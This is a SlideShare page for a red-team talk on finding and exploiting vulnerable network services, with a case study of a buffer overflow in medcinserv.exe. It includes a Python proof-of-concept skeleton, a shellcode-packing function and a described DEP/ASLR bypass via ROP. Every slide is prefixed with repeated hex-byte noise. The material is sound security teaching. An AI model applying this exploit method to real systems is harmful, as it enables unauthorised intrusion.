SlideShare a Scribd company logo

Software vulnerability discovery and exploitation during red team assessments

Download as PPTX, PDF
B
b0yd

Walk through for identifying, reverse engineering, and exploiting vulnerable network services during live red team assessments.

Software
1 of 35
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 SoftwareVulnerability Discovery & Exploitation During RedTeam Assessments Ryan Wincey rwincey@securifera.com 9/30/2015
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Background • Long term red team assessments • Persistence with remote access tools • Looking for alternative means of network propagation or privilege escalation
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 IdentifyTargets • Look for applications that are listening on sockets or running at a higher privilege level • Windows netstat -ano | findstr LISTEN
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 IdentifyTargets • Look for applications that are listening on sockets or running at a higher privilege level • Windows tasklist /v | findstr <pid>
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 IdentifyTargets • Look for applications that are listening on sockets or running at a higher privilege level • Linux netstat -anop | grep LISTEN ps -ef | grep <pid>
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 StaticAnalysis • Reverse Engineering Software – IDA Pro/Hexrays – Hopper – Other • Target Binary
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 StaticAnalysis • Helpful bug hunting tips – Identify areas where data is introduced from outside of the application • Command Line Parameters • Socket Reads • File Reads • Environment Variables • i.e. read, gets, fread, fgets, recv, recv_from
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 StaticAnalysis • Helpful bug hunting tips – Trace those inputs to parsing functions; look for interesting functions and memory operations • strcpy, strcat • sprintf, printf • memcpy • system • any custom string or memory copies
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Dynamic Analysis Checklist • In order to perform dynamic analysis, we will need to ensure that the application will run in our test environment. • Tips for getting the application to run. – Zip up support files in the same directory. ( 7za, zip ) – Listdlls.exe, ldd - loaded libraries – Handle.exe, /proc/<pid> - open files – Procmon.exe – identify registry keys – Read log files – track down missing files or registry settings
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Analyzing Process Memory • Comparing the running process environment to your test environment. • Windows procdump.exe /accepteula -ma <pid> <dump file> • Linux gdb attach <pid>
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Crash Dumps • In the event that you crash the application and want to collect crash dumps. • Windows HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsWindows Error ReportingLocalDumps DumpFolder DumpCount DumpType CustomDumpFlags • Linux ulimit –c unlimited
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 • Identify target and binary location Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Identify target and binary location
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 • Static analysis using IDA Pro and HexRays decompiler. Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 • Static analysis using IDA Pro and HexRays decompiler. Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 • Static analysis using IDA Pro and HexRays decompiler. Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Locate additional dependencies
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Locate additional dependencies
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Locate additional dependencies
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Query service details in registry
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Setup as nearly identical environment • Operating system • File system • Service registration • Debugging tools • Scripting support
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Set breakpoint on our vulnerable function
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Set breakpoint on our vulnerable function
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • POC Skeleton – Define Protocol [ Message Type : 2 bytes ][ Data Length : 4 bytes ][ Data ] – Choose Implementation Python, Ruby, Powershell, C – Code up boiler plate stuff / Use template Socket connect, send, recv, Formatting
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • POC Skeleton if len (sys.argv) == 3: (progname, host, port) = sys.argv else: print 'Usage: {0} host port'.format (sys.argv[0]) exit (1) csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) csock.connect ( (host, int(port)) ) csock.settimeout(1) print "[+] connected to server." #Try things i = 238 data = “1,” * 1000 print "[+] sending data." send( i, len(data) + 6, data) csock.close() print "[+] goodbye" def send(type, pack_len, data=None): if pack_len < 6 or pack_len > 0x3d090: print "Length must be between 6 and 0x3d090 bytes." #Set the type buf = struct.pack('>h', type) #Send length, must be less than 0x3d090, can be negative buf += struct.pack('>i', pack_len) #Send data if pack_len > 0: buf += data try: #Send data csock.send(buf) except: pass Integer Array
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • We own EIP 
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Our target environment, Windows 7 SP1, has DEP, ASLR, and SafeSEH on all OS libraries. • Medcinserv.exe, doesn’t have any built in protections
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Bypass DEP by changing the execution permissions of the stack dynamically. • Change permissions using ROP chain composed of gadgets from the medcinserv binary. • Bypass ASLR because ROP gadgets in medcinserv binary are static. • NULL bytes are allowed since it’s an integer array buffer overflow.
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • ROP gadgets generated for VirtualAlloc • Resolve VirtualAlloc using GetModuleHandle and GetProcAddress
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Exploit Design Structure
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Case Study: medcinserv.exe IAVM Notice Number: 2015-A-0127 • Shellcode to String Array Function def add_shellcode( sc ): global data #Determine the iterator shellcode_len = len(sc) iterator = shellcode_len / 4 if shellcode_len % 4 > 0: iterator +=1 counter = 0 for i in range( int( iterator ) ): entry = sc[ (i*4) : (i*4)+4 ] #Make sure length is four bytes len_entry = len(entry) if len( entry ) < 4: entry += "x90" * ( 4 - len_entry) data += str(struct.unpack("<I", entry )[0]) + "," counter += 1 return counter
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 DEMO
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Test Exploit • Test in as nearly identical environment as possible • Non-critical systems, preferably when users are away • Make sure to get permission • Get more shellz 
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 Reporting • US CERT • MITRE • NIST
FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 FF ED 1B 38 50 68 6F 74 6F 73 68 6F 70 20 33 30 00 38 42 49 4D 03 ED 00 00 00 00 00 10 00 48 00 00 00 01 00 01 00 48 00 23 43 91 39 49 29 32 19 00 23 33 45 88 91 21 02 93 04 56 90 02 12 49 20 39 09 20 23 94 73 09 62 83 21 92 67 00 25 34 43 76 89 QUESTIONS? rwincey@securifera.com

Recommended

Reverse engineering of binary programs for custom virtual machines
Reverse engineering of binary programs for custom virtual machinesReverse engineering of binary programs for custom virtual machines
Reverse engineering of binary programs for custom virtual machinesSmartDec
 
A New Framework for Detection
A New Framework for DetectionA New Framework for Detection
A New Framework for DetectionSourcefire VRT
 
On Prototyping IEEE 802.11p Channel Estimators in Real-World Environments usi...
On Prototyping IEEE 802.11p Channel Estimators in Real-World Environments usi...On Prototyping IEEE 802.11p Channel Estimators in Real-World Environments usi...
On Prototyping IEEE 802.11p Channel Estimators in Real-World Environments usi...Stefano Severi
 
On the benchmark of Chainer
On the benchmark of ChainerOn the benchmark of Chainer
On the benchmark of ChainerKenta Oono
 
Deep parking
Deep parkingDeep parking
Deep parkingShintaro Shiba
 
深層学習ライブラリの環境問題Chainer Meetup2016 07-02
深層学習ライブラリの環境問題Chainer Meetup2016 07-02深層学習ライブラリの環境問題Chainer Meetup2016 07-02
深層学習ライブラリの環境問題Chainer Meetup2016 07-02Yuta Kashino
 
ヤフー音声認識サービスでのディープラーニングとGPU利用事例
ヤフー音声認識サービスでのディープラーニングとGPU利用事例ヤフー音声認識サービスでのディープラーニングとGPU利用事例
ヤフー音声認識サービスでのディープラーニングとGPU利用事例Yahoo!デベロッパーネットワーク
 
俺のtensorが全然flowしないのでみんなchainer使おう by DEEPstation
俺のtensorが全然flowしないのでみんなchainer使おう by DEEPstation俺のtensorが全然flowしないのでみんなchainer使おう by DEEPstation
俺のtensorが全然flowしないのでみんなchainer使おう by DEEPstationYusuke HIDESHIMA
 

Recommended

Reverse engineering of binary programs for custom virtual machines
Reverse engineering of binary programs for custom virtual machinesReverse engineering of binary programs for custom virtual machines
Reverse engineering of binary programs for custom virtual machinesSmartDec
 
A New Framework for Detection
A New Framework for DetectionA New Framework for Detection
A New Framework for DetectionSourcefire VRT
 
On Prototyping IEEE 802.11p Channel Estimators in Real-World Environments usi...
On Prototyping IEEE 802.11p Channel Estimators in Real-World Environments usi...On Prototyping IEEE 802.11p Channel Estimators in Real-World Environments usi...
On Prototyping IEEE 802.11p Channel Estimators in Real-World Environments usi...Stefano Severi
 
On the benchmark of Chainer
On the benchmark of ChainerOn the benchmark of Chainer
On the benchmark of ChainerKenta Oono
 
Deep parking
Deep parkingDeep parking
Deep parkingShintaro Shiba
 
深層学習ライブラリの環境問題Chainer Meetup2016 07-02
深層学習ライブラリの環境問題Chainer Meetup2016 07-02深層学習ライブラリの環境問題Chainer Meetup2016 07-02
深層学習ライブラリの環境問題Chainer Meetup2016 07-02Yuta Kashino
 
ヤフー音声認識サービスでのディープラーニングとGPU利用事例
ヤフー音声認識サービスでのディープラーニングとGPU利用事例ヤフー音声認識サービスでのディープラーニングとGPU利用事例
ヤフー音声認識サービスでのディープラーニングとGPU利用事例Yahoo!デベロッパーネットワーク
 
俺のtensorが全然flowしないのでみんなchainer使おう by DEEPstation
俺のtensorが全然flowしないのでみんなchainer使おう by DEEPstation俺のtensorが全然flowしないのでみんなchainer使おう by DEEPstation
俺のtensorが全然flowしないのでみんなchainer使おう by DEEPstationYusuke HIDESHIMA
 
Generic Framework for Knowledge Classification-1
Generic Framework for Knowledge Classification-1Generic Framework for Knowledge Classification-1
Generic Framework for Knowledge Classification-1Venkata Vineel
 
Monitoring Containers with Weave Scope
Monitoring Containers with Weave ScopeMonitoring Containers with Weave Scope
Monitoring Containers with Weave ScopeWeaveworks
 
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoringOSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoringNETWAYS
 
Performance Risk Management
Performance Risk ManagementPerformance Risk Management
Performance Risk ManagementViswanath Chittoory
 
Building A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerBuilding A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerXavier Mertens
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflowsjohseg
 
OSMC 2015: Linux Performance Profiling and Monitoring by Werner Fischer
OSMC 2015: Linux Performance Profiling and Monitoring by Werner FischerOSMC 2015: Linux Performance Profiling and Monitoring by Werner Fischer
OSMC 2015: Linux Performance Profiling and Monitoring by Werner FischerNETWAYS
 
OSMC 2015 | Linux Performance Profiling and Monitoring by Werner Fischer
OSMC 2015 | Linux Performance Profiling and Monitoring by Werner FischerOSMC 2015 | Linux Performance Profiling and Monitoring by Werner Fischer
OSMC 2015 | Linux Performance Profiling and Monitoring by Werner FischerNETWAYS
 
II-SDV 2015, 20 - 21 April, in Nice
II-SDV 2015, 20 - 21 April, in NiceII-SDV 2015, 20 - 21 April, in Nice
II-SDV 2015, 20 - 21 April, in NiceDr. Haxel Consult
 
Linux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPFLinux 4.x Tracing: Performance Analysis with bcc/BPF
Linux 4.x Tracing: Performance Analysis with bcc/BPFBrendan Gregg
 
Xilinx vs Intel (Altera) FPGA performance comparison
Xilinx vs Intel (Altera) FPGA performance comparison Xilinx vs Intel (Altera) FPGA performance comparison
Xilinx vs Intel (Altera) FPGA performance comparison Roy Messinger
 
Detecting Malicious Websites using Machine Learning
Detecting Malicious Websites using Machine LearningDetecting Malicious Websites using Machine Learning
Detecting Malicious Websites using Machine LearningAndrew Beard
 
BRKDCT-3144 - Advanced - Troubleshooting Cisco Nexus 7000 Series Switches (20...
BRKDCT-3144 - Advanced - Troubleshooting Cisco Nexus 7000 Series Switches (20...BRKDCT-3144 - Advanced - Troubleshooting Cisco Nexus 7000 Series Switches (20...
BRKDCT-3144 - Advanced - Troubleshooting Cisco Nexus 7000 Series Switches (20...aaajjj4
 
Using Machine Learning to Debug Oracle RAC Issues
Using Machine Learning to Debug Oracle RAC IssuesUsing Machine Learning to Debug Oracle RAC Issues
Using Machine Learning to Debug Oracle RAC IssuesAnil Nair
 
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"
Рахманов Александр "Что полезного в разборе дампов для .NET-разработчиков?"Yulia Tsisyk
 
Accumulo Summit 2016: You Won't Believe These 3 Tricks for Maximizing Accumul...
Accumulo Summit 2016: You Won't Believe These 3 Tricks for Maximizing Accumul...Accumulo Summit 2016: You Won't Believe These 3 Tricks for Maximizing Accumul...
Accumulo Summit 2016: You Won't Believe These 3 Tricks for Maximizing Accumul...Accumulo Summit
 
Examining Malware with Python
Examining Malware with PythonExamining Malware with Python
Examining Malware with Pythonmrphilroth
 
Data mining cyber security
Data mining cyber securityData mining cyber security
Data mining cyber securityAmir Razmjou
 
Using GSP data mining algorithm to detect malicious flows in Lawrence Berkele...
Using GSP data mining algorithm to detect malicious flows in Lawrence Berkele...Using GSP data mining algorithm to detect malicious flows in Lawrence Berkele...
Using GSP data mining algorithm to detect malicious flows in Lawrence Berkele...Amir Razmjou
 
Oracle Basics and Architecture
Oracle Basics and ArchitectureOracle Basics and Architecture
Oracle Basics and ArchitectureSidney Chen
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanyChristoph Pohl
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 

More Related Content

Similar to Software vulnerability discovery and exploitation during red team assessments

Generic Framework for Knowledge Classification-1
Generic Framework for Knowledge Classification-1Generic Framework for Knowledge Classification-1
Generic Framework for Knowledge Classification-1Venkata Vineel
 
Monitoring Containers with Weave Scope
Monitoring Containers with Weave ScopeMonitoring Containers with Weave Scope
Monitoring Containers with Weave ScopeWeaveworks
 
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoringOSDC 2017 - Werner Fischer - Linux performance profiling and monitoring
OSDC 2017 - Werner Fischer - Linux performance profiling and monitoringNETWAYS
 
Building A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerBuilding A Poor man’s Fir3Ey3 Mail Scanner
Building A Poor man’s Fir3Ey3 Mail ScannerXavier Mertens
 
Scale17x buffer overflows
Scale17x buffer overflowsScale17x buffer overflows
Scale17x buffer overflowsjohseg
 
OSMC 2015: Linux Performance Profiling and Monitoring by Werner Fischer
OSMC 2015: Linux Performance Profiling and Monitoring by Werner FischerOSMC 2015: Linux Performance Profiling and Monitoring by Werner Fischer
OSMC 2015: Linux Performance Profiling and Monitoring by Werner FischerNETWAYS
 
OSMC 2015 | Linux Performance Profiling and Monitoring by Werner Fischer
OSMC 2015 | Linux Performance Profiling and Monitoring by Werner FischerOSMC 2015 | Linux Performance Profiling and Monitoring by Werner Fischer
OSMC 2015 | Linux Performance Profiling and Monitoring by Werner FischerNETWAYS
 
II-SDV 2015, 20 - 21 April, in Nice
